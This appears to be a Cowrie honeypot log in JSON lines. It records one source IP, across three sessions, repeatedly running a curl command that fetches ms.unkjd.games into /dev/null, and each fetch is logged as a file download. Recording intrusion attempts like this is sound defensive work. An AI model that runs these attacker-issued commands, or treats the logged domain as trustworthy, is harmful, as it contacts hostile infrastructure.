{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.936532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.937772Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.938547Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.942217Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.943003Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.946851Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.949745Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.950737Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.977564Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.979425Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.981567Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.982614Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.983422Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.991307Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.991888Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.993899Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.994601Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.019065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.021110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.022456Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.023147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.027284Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.031059Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.034016Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.046314Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.046968Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.050049Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.050821Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.054511Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.058271Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.076542Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.077162Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.086344Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.091138Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.091830Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.110794Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.111447Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.114377Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.114883Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.118062Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.121146Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.123739Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.142764Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.143651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.148114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.150802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.151444Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.155463Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.176012Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.176984Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.179651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.180578Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.183479Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.187374Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.188411Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.217399Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.218768Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.219377Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.223431Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.223951Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.232510Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.233160Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.236803Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.268455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.270324Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.271727Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.272268Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.274292Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.275404Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.279381Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.280117Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.287004Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.312820Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.313808Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.314459Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.318789Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.319922Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.320685Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.322016Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.322529Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
